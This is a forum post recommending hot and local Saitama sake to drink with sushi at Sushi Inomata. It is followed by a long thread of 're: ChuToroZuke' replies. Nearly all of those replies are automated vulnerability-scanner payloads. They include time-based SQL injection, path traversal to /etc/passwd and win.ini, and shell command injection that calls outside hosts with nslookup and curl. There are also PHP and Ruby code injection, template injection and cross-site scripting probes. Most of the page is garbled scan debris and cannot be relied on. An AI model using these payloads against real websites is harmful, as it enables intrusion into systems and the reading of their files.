For those who drink sake, you can ask Sushi Inomata for their selection of hot sake which I think may be more interesting than Sushi Kimura's. They will be poured from 1.8L bottles and warmed with the right methods and served in the correct ceramic cups. A few selections may be surprising, including aged nama sake and depending on what they choose to pour, and you can let okami san know your preferences if you have them. Also for those feeling adventurous, you can ask for local Saitama prefecture sake, that way you get a great taste of locally brewed sake, some of which are quite fantastic (personally I love Shinkame / Holy Turtle, and Coedo Kagamiyama / Little Edo Mirror Mountain) depending on availability. Shinkame and Kagamiyama tend to be on the dryer side, and judging from a few tabelog photos, dry sake seems to be the way to go here for sake pairing (he has one called Makiri from Yamagata that is a Super Dry Junmai Daiginjo, that one should nicely cleanse any richness from fish). I have found that some of the regular menu sake that can be a fruity, doesn't pair as nicely with his sushi, but may be more approachable for casual sake drinkers.
re: ChuToroZuke
jJBgcK3m
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
-1 OR 2+401-401-1=0+0+0+1
re: ChuToroZuke
-1 OR 3+401-401-1=0+0+0+1
re: ChuToroZuke
if(now()=sysdate(),sleep(15),0)
re: ChuToroZuke
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: ChuToroZuke
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: ChuToroZuke
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ChuToroZuke
-1; waitfor delay '0:0:15' --
re: ChuToroZuke
-1); waitfor delay '0:0:15' --
re: ChuToroZuke
3Co9zEOP
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
-1 OR 2+655-655-1=0+0+0+1
re: ChuToroZuke
-1 OR 3+655-655-1=0+0+0+1
re: ChuToroZuke
1 waitfor delay '0:0:15' --
re: ChuToroZuke
if(now()=sysdate(),sleep(15),0)
re: ChuToroZuke
cvx10UpN'; waitfor delay '0:0:15' --
re: ChuToroZuke
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: ChuToroZuke
-5 OR 261=(SELECT 261 FROM PG_SLEEP(15))--
re: ChuToroZuke
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: ChuToroZuke
-5) OR 313=(SELECT 313 FROM PG_SLEEP(15))--
re: ChuToroZuke
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ChuToroZuke
-1)) OR 383=(SELECT 383 FROM PG_SLEEP(15))--
re: ChuToroZuke
-1; waitfor delay '0:0:15' --
re: ChuToroZuke
O3Ouadig' OR 472=(SELECT 472 FROM PG_SLEEP(15))--
re: ChuToroZuke
-1); waitfor delay '0:0:15' --
re: ChuToroZuke
wKHU8b3p') OR 595=(SELECT 595 FROM PG_SLEEP(15))--
re: ChuToroZuke
1 waitfor delay '0:0:15' --
re: ChuToroZuke
PnHXuSsr')) OR 12=(SELECT 12 FROM PG_SLEEP(15))--
re: ChuToroZuke
0zs4ezs5'; waitfor delay '0:0:15' --
re: ChuToroZuke
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: ChuToroZuke
-5 OR 505=(SELECT 505 FROM PG_SLEEP(15))--
re: ChuToroZuke
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: ChuToroZuke
-5) OR 81=(SELECT 81 FROM PG_SLEEP(15))--
re: ChuToroZuke
'||(select 1 from (select pg_sleep(15))x)||'
re: ChuToroZuke
-1)) OR 588=(SELECT 588 FROM PG_SLEEP(15))--
re: ChuToroZuke
''||(select 1 from (select pg_sleep(15))x)||''
re: ChuToroZuke
1'"
re: ChuToroZuke
@@KElNm
re: ChuToroZuke
RPxPBO57' OR 102=(SELECT 102 FROM PG_SLEEP(15))--
re: ChuToroZuke
MXL0KH7W') OR 351=(SELECT 351 FROM PG_SLEEP(15))--
re: ChuToroZuke
p9qANsom')) OR 334=(SELECT 334 FROM PG_SLEEP(15))--
re: ChuToroZuke
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: ChuToroZuke
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: ChuToroZuke
'||(select 1 from (select pg_sleep(15))x)||'
re: ChuToroZuke
''||(select 1 from (select pg_sleep(15))x)||''
re: ChuToroZuke
1'"
re: ChuToroZuke
@@Qb1jw
re: ChuToroZuke
1h8R2ECEO
re: ChuToroZuke
response.write(9309270*9781753)
re: ChuToroZuke
'+response.write(9309270*9781753)+'
re: ChuToroZuke
%0abcc:074625.67-14554.67.1a5f6.19990.2@bxss.me
re: ChuToroZuke
"+response.write(9309270*9781753)+"
re: ChuToroZuke
to@example.com>%0d%0abcc:074625.67-14555.67.1a5f6.19990.2@bxss.me
re: ChuToroZuke
<esi:include src="http://bxss.me/rpb.png"/>
re: ChuToroZuke
${9999547+10000126}
re: ChuToroZuke
../../../../../../../../../../../../../../etc/passwd
re: ChuToroZuke
../../../../../../../../../../../../../../windows/win.ini
re: ChuToroZuke
file:///etc/passwd
re: ChuToroZuke
../../../../../../../../../../../../../../../proc/version
re: ChuToroZuke
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: ChuToroZuke
../../../../../../../../../../etc/passwd%00.jpg
re: ChuToroZuke
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: ChuToroZuke
)
re: ChuToroZuke
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: ChuToroZuke
!(()&&!|*|*|
re: ChuToroZuke
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: ChuToroZuke
^(#$!@#$)(()))******
re: ChuToroZuke
echo uttqet$()\ dzttxf\nz^xyu||a #' &echo uttqet$()\ dzttxf\nz^xyu||a #|" &echo uttqet$()\ dzttxf\nz^xyu||a #
re: ChuToroZuke
'.gethostbyname(lc('hitns'.'dhvwokgh88734.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(66).chr(111).chr(87).'
re: ChuToroZuke
/etc/passwd
re: ChuToroZuke
&echo eewqor$()\ lsuvum\nz^xyu||a #' &echo eewqor$()\ lsuvum\nz^xyu||a #|" &echo eewqor$()\ lsuvum\nz^xyu||a #
re: ChuToroZuke
%2fetc%2fpasswd
re: ChuToroZuke
".gethostbyname(lc("hitoj"."mugptcedd13ba.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(74).chr(109).chr(87)."
re: ChuToroZuke
|echo tezlzd$()\ ytedla\nz^xyu||a #' |echo tezlzd$()\ ytedla\nz^xyu||a #|" |echo tezlzd$()\ ytedla\nz^xyu||a #
re: ChuToroZuke
/.././.././.././.././.././.././.././../etc/./passwd%00
re: ChuToroZuke
(nslookup hitbbsnmyhduzb9e65.bxss.me||perl -e "gethostbyname('hitbbsnmyhduzb9e65.bxss.me')")
re: ChuToroZuke
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: ChuToroZuke
$(nslookup hitbvcbucvejv137a4.bxss.me||perl -e "gethostbyname('hitbvcbucvejv137a4.bxss.me')")
re: ChuToroZuke
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: ChuToroZuke
&nslookup hitsrecbmxjys43367.bxss.me&'\"`0&nslookup hitsrecbmxjys43367.bxss.me&`'
re: ChuToroZuke
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: ChuToroZuke
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: ChuToroZuke
&(nslookup hitrqgmhgvvfsf3db6.bxss.me||perl -e "gethostbyname('hitrqgmhgvvfsf3db6.bxss.me')")&'\"`0&(nslookup hitrqgmhgvvfsf3db6.bxss.me||perl -e "gethostbyname('hitrqgmhgvvfsf3db6.bxss.me')")&`'
re: ChuToroZuke
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: ChuToroZuke
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: ChuToroZuke
|(nslookup hitofdwordfks881e3.bxss.me||perl -e "gethostbyname('hitofdwordfks881e3.bxss.me')")
re: ChuToroZuke
Http://bxss.me/t/fit.txt
re: ChuToroZuke
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: ChuToroZuke
`(nslookup hitfxzrfkvcjg8b40f.bxss.me||perl -e "gethostbyname('hitfxzrfkvcjg8b40f.bxss.me')")`
re: ChuToroZuke
http://bxss.me/t/fit.txt%3F.jpg
re: ChuToroZuke
HttP://bxss.me/t/xss.html?%00
re: ChuToroZuke
file:///etc/passwd
re: ChuToroZuke
"+"A".concat(70-3).concat(22*4).concat(102).concat(66).concat(108).concat(74)+(require"socket"
Socket.gethostbyname("hithj"+"qpvektvjc1c03.bxss.me.")[3].to_s)+"
re: ChuToroZuke
;(nslookup hitxihwuserrxffbfb.bxss.me||perl -e "gethostbyname('hitxihwuserrxffbfb.bxss.me')")|(nslookup hitxihwuserrxffbfb.bxss.me||perl -e "gethostbyname('hitxihwuserrxffbfb.bxss.me')")&(nslookup hitxihwuserrxffbfb.bxss.me||perl -e "gethostbyname('hitxihwuserrxffbfb.bxss.me')")
re: ChuToroZuke
/etc/shells
re: ChuToroZuke
bxss.me/t/xss.html?%00
re: ChuToroZuke
'+'A'.concat(70-3).concat(22*4).concat(107).concat(83).concat(103).concat(65)+(require'socket'
Socket.gethostbyname('hitac'+'mydbsvrq54991.bxss.me.')[3].to_s)+'
re: ChuToroZuke
/\../\../\../\../\../\../\../etc/passwd
re: ChuToroZuke
c:/windows/win.ini
re: ChuToroZuke
/WEB-INF/web.xml
re: ChuToroZuke
bxss.me
re: ChuToroZuke
C:\WINDOWS\system32\drivers\etc\hosts
re: ChuToroZuke
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: ChuToroZuke
../../../../../../../../../../windows/win.ini%00.jpg
re: ChuToroZuke
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: ChuToroZuke
/../../../../../../../../../../boot.ini
re: ChuToroZuke
';print(md5(31337));$a='
re: ChuToroZuke
'"
re: ChuToroZuke
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: ChuToroZuke
";print(md5(31337));$a="
re: ChuToroZuke
<!--
re: ChuToroZuke
..\..\..\..\..\..\..\..\windows\win.ini
re: ChuToroZuke
${@print(md5(31337))}
re: ChuToroZuke
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: ChuToroZuke
${@print(md5(31337))}\
re: ChuToroZuke
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: ChuToroZuke
'.print(md5(31337)).'
re: ChuToroZuke
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: ChuToroZuke
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: ChuToroZuke
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: ChuToroZuke
WEB-INF/web.xml
re: ChuToroZuke
WEB-INF\web.xml
re: ChuToroZuke
1
re: ChuToroZuke
1
re: ChuToroZuke
-1 OR 2+800-800-1=0+0+0+1 --
re: ChuToroZuke
-1 OR 3+800-800-1=0+0+0+1 --
re: ChuToroZuke
-1 OR 2+494-494-1=0+0+0+1
re: ChuToroZuke
-1 OR 3+494-494-1=0+0+0+1
re: ChuToroZuke
-1' OR 2+760-760-1=0+0+0+1 --
re: ChuToroZuke
-1' OR 3+760-760-1=0+0+0+1 --
re: ChuToroZuke
-1' OR 2+269-269-1=0+0+0+1 or '1bA9MUAJ'='
re: ChuToroZuke
-1' OR 3+269-269-1=0+0+0+1 or '1bA9MUAJ'='
re: ChuToroZuke
-1" OR 2+42-42-1=0+0+0+1 --
re: ChuToroZuke
-1" OR 3+42-42-1=0+0+0+1 --
re: ChuToroZuke
if(now()=sysdate(),sleep(15),0)
re: ChuToroZuke
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: ChuToroZuke
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: ChuToroZuke
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ChuToroZuke
-1; waitfor delay '0:0:15' --
re: ChuToroZuke
-1); waitfor delay '0:0:15' --
re: ChuToroZuke
1 waitfor delay '0:0:15' --
re: ChuToroZuke
1KMzRClq'; waitfor delay '0:0:15' --
re: ChuToroZuke
-5 OR 972=(SELECT 972 FROM PG_SLEEP(15))--
re: ChuToroZuke
-5) OR 581=(SELECT 581 FROM PG_SLEEP(15))--
re: ChuToroZuke
-1)) OR 52=(SELECT 52 FROM PG_SLEEP(15))--
re: ChuToroZuke
egtSfcXQ' OR 307=(SELECT 307 FROM PG_SLEEP(15))--
re: ChuToroZuke
BSLlevcR') OR 105=(SELECT 105 FROM PG_SLEEP(15))--
re: ChuToroZuke
odnKbKp3')) OR 202=(SELECT 202 FROM PG_SLEEP(15))--
re: ChuToroZuke
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: ChuToroZuke
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: ChuToroZuke
'||(select 1 from (select pg_sleep(15))x)||'
re: ChuToroZuke
''||(select 1 from (select pg_sleep(15))x)||''
re: ChuToroZuke
1'"
re: ChuToroZuke
@@pPYOB
re: ChuToroZuke
1HLQHECX60
re: ChuToroZuke
response.write(9569370*9160225)
re: ChuToroZuke
'+response.write(9569370*9160225)+'
re: ChuToroZuke
"+response.write(9569370*9160225)+"
re: ChuToroZuke
../../../../../../../../../../../../../../etc/passwd
re: ChuToroZuke
<esi:include src="http://bxss.me/rpb.png"/>
re: ChuToroZuke
${10000383+9999698}
re: ChuToroZuke
../../../../../../../../../../../../../../windows/win.ini
re: ChuToroZuke
file:///etc/passwd
re: ChuToroZuke
../
re: ChuToroZuke
)
re: ChuToroZuke
!(()&&!|*|*|
re: ChuToroZuke
^(#$!@#$)(()))******
re: ChuToroZuke
redirtest.acx
re: ChuToroZuke
ctime
sleep
p0
(I30
tp1
Rp2
.
re: ChuToroZuke
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: ChuToroZuke
echo zqxijz$()\ bgvptc\nz^xyu||a #' &echo zqxijz$()\ bgvptc\nz^xyu||a #|" &echo zqxijz$()\ bgvptc\nz^xyu||a #
re: ChuToroZuke
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: ChuToroZuke
'.gethostbyname(lc('hitcr'.'kllplfva8ebea.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(88).chr(111).chr(80).'
re: ChuToroZuke
&echo gsguuy$()\ gvujfn\nz^xyu||a #' &echo gsguuy$()\ gvujfn\nz^xyu||a #|" &echo gsguuy$()\ gvujfn\nz^xyu||a #
re: ChuToroZuke
/etc/shells
re: ChuToroZuke
".gethostbyname(lc("hitzy"."lztbcrqv01df7.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(74).chr(97).chr(80)."
re: ChuToroZuke
|echo ijirtp$()\ ezsjpr\nz^xyu||a #' |echo ijirtp$()\ ezsjpr\nz^xyu||a #|" |echo ijirtp$()\ ezsjpr\nz^xyu||a #
re: ChuToroZuke
../../../../../../../../../../../../../../etc/shells
re: ChuToroZuke
gethostbyname(lc('hitdh'.'ngvtbtjt0f5ef.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(79).chr(102).chr(83)
re: ChuToroZuke
expr 9000121218 - 959928
re: ChuToroZuke
c:/windows/win.ini
re: ChuToroZuke
(nslookup -q=cname hitouzuxwtjnn940eb.bxss.me||curl hitouzuxwtjnn940eb.bxss.me))
re: ChuToroZuke
bxss.me
re: ChuToroZuke
$(nslookup -q=cname hitgadfzoytyb36ef6.bxss.me||curl hitgadfzoytyb36ef6.bxss.me)
re: ChuToroZuke
Http://bxss.me/t/fit.txt
re: ChuToroZuke
&nslookup -q=cname hitsbjqtwlbxp76a4f.bxss.me&'\"`0&nslookup -q=cname hitsbjqtwlbxp76a4f.bxss.me&`'
re: ChuToroZuke
http://bxss.me/t/fit.txt?.jpg
re: ChuToroZuke
&(nslookup -q=cname hitpmyfelkhqnb6c77.bxss.me||curl hitpmyfelkhqnb6c77.bxss.me)&'\"`0&(nslookup -q=cname hitpmyfelkhqnb6c77.bxss.me||curl hitpmyfelkhqnb6c77.bxss.me)&`'
re: ChuToroZuke
|(nslookup -q=cname hithliyjznnee59707.bxss.me||curl hithliyjznnee59707.bxss.me)
re: ChuToroZuke
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: ChuToroZuke
`(nslookup -q=cname hitbuhfneobqq95d7d.bxss.me||curl hitbuhfneobqq95d7d.bxss.me)`
re: ChuToroZuke
';print(md5(31337));$a='
re: ChuToroZuke
";print(md5(31337));$a="
re: ChuToroZuke
;(nslookup -q=cname hityycbmlcgjv75c2e.bxss.me||curl hityycbmlcgjv75c2e.bxss.me)|(nslookup -q=cname hityycbmlcgjv75c2e.bxss.me||curl hityycbmlcgjv75c2e.bxss.me)&(nslookup -q=cname hityycbmlcgjv75c2e.bxss.me||curl hityycbmlcgjv75c2e.bxss.me)
re: ChuToroZuke
HttP://bxss.me/t/xss.html?%00
re: ChuToroZuke
'"()
re: ChuToroZuke
${@print(md5(31337))}
re: ChuToroZuke
|(nslookup${IFS}-q${IFS}cname${IFS}hitruzxerxurl5aaab.bxss.me||curl${IFS}hitruzxerxurl5aaab.bxss.me)
re: ChuToroZuke
bxss.me/t/xss.html?%00
re: ChuToroZuke
'&&sleep(27*1000)*szkfou&&'
re: ChuToroZuke
${@print(md5(31337))}\
re: ChuToroZuke
&(nslookup${IFS}-q${IFS}cname${IFS}hitdfnbgavisda1e6a.bxss.me||curl${IFS}hitdfnbgavisda1e6a.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitdfnbgavisda1e6a.bxss.me||curl${IFS}hitdfnbgavisda1e6a.bxss.me)&`'
re: ChuToroZuke
"+"A".concat(70-3).concat(22*4).concat(118).concat(77).concat(99).concat(70)+(require"socket"
Socket.gethostbyname("hitzm"+"zfaabnwuae353.bxss.me.")[3].to_s)+"
re: ChuToroZuke
'.print(md5(31337)).'
re: ChuToroZuke
"&&sleep(27*1000)*xopgfu&&"
re: ChuToroZuke
'+'A'.concat(70-3).concat(22*4).concat(109).concat(67).concat(101).concat(67)+(require'socket'
Socket.gethostbyname('hitbd'+'nzpvbrfh34749.bxss.me.')[3].to_s)+'
re: ChuToroZuke
'||sleep(27*1000)*dqkjtx||'
re: ChuToroZuke
'A'.concat(70-3).concat(22*4).concat(114).concat(77).concat(122).concat(79)+(require'socket'
Socket.gethostbyname('hitok'+'cwmabiqbdeb06.bxss.me.')[3].to_s)
re: ChuToroZuke
"||sleep(27*1000)*dpgapi||"
re: ChuToroZuke
'"
re: ChuToroZuke
replies
re: ChuToroZuke
<!--
re: ChuToroZuke
replies�
re: ChuToroZuke
replies/.
re: ChuToroZuke
